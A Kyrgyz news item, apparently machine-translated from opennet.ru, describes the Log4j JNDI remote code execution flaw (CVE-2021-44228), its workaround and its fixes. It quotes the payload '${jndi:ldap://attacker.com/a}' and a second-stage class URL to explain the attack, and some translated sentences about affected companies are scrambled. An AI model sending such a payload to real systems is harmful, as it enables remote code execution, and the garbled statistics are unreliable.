Apache Log4j, Java тиркемелеринде каттоону уюштуруу үчүн популярдуу алкактарда журналга “{jndi:URL}” форматында атайын форматталган маани жазылганда каалаган кодду аткарууга мүмкүндүк берген олуттуу кемчилик аныкталган. Кол салуу тышкы булактардан алынган маанилерди журналга алган Java тиркемелеринде, мисалы, ката билдирүүлөрүндө көйгөйлүү маанилерди көрсөтүүдө жүргүзүлүшү мүмкүн.
Белгилей кетсек, Apache Struts, Apache Solr, Apache Druid же Apache Flink сыяктуу алкактарды колдонгон дээрлик бардык долбоорлор Steam, Apple iCloud, Minecraft кардарлары жана серверлери менен байланышкан. Алсыздык корпоративдик тиркемелерге массалык чабуулдардын толкунуна алып келиши мүмкүн деп күтүлүүдө, Apache Struts алкагындагы критикалык алсыздыктар тарыхын кайталап, болжолдуу баа боюнча, Fortune 65% веб-тиркемелерде колдонулат. 100 компания, анын ичинде тармакта аялуу системаларды издөө аракеттери.
Жумушчу эксплуатация буга чейин жарыяланган, бирок туруктуу бутактар үчүн оңдоолор али түзүлө электиги көйгөйдү курчутат. CVE идентификатору азырынча дайындала элек. Оңдоо log4j-2.15.0-rc1 сыноо тармагына гана киргизилген. Алсыздыкты бөгөттөө үчүн убактылуу чечим катары log4j2.formatMsgNoLookups параметрин чындыкка коюу сунушталат.
Көйгөй log4j JNDI (Java аталышы жана каталог интерфейси) сурамдары аткарыла турган журналга чыгарылган саптардагы “{}” атайын маскаларды иштетүүнү колдогонунан келип чыккан. Чабуул "${jndi:ldap://attacker.com/a}" алмаштыруусу менен сапты өткөрүүгө чейин жетет, аны иштеткенде log4j Java классына жол үчүн LDAP өтүнүчүн attacker.com серверине жөнөтөт. . Кол салуучунун сервери кайтарган жол (мисалы, http://second-stage.attacker.com/Exploit.class) учурдагы процесстин контекстинде жүктөлөт жана аткарылат, бул чабуулчуга каалаган кодду аткарууга мүмкүндүк берет. учурдагы колдонмонун укуктары менен система.
1-тиркеме: Абалына CVE-2021-44228 идентификатору ыйгарылган.
2-тиркеме: log4j-2.15.0-rc1 релизинин жардамы менен кошулган коргоону айланып өтүү жолу аныкталган. Жаңы жаңыртуу, log4j-2.15.0-rc2, алсыздыктан толук коргоосу менен сунушталды. Код туура эмес форматталган JNDI URL дарегин колдонгон учурда анормалдуу токтотуунун жоктугу менен байланышкан өзгөрүүнү баса белгилейт.
Source: opennet.ru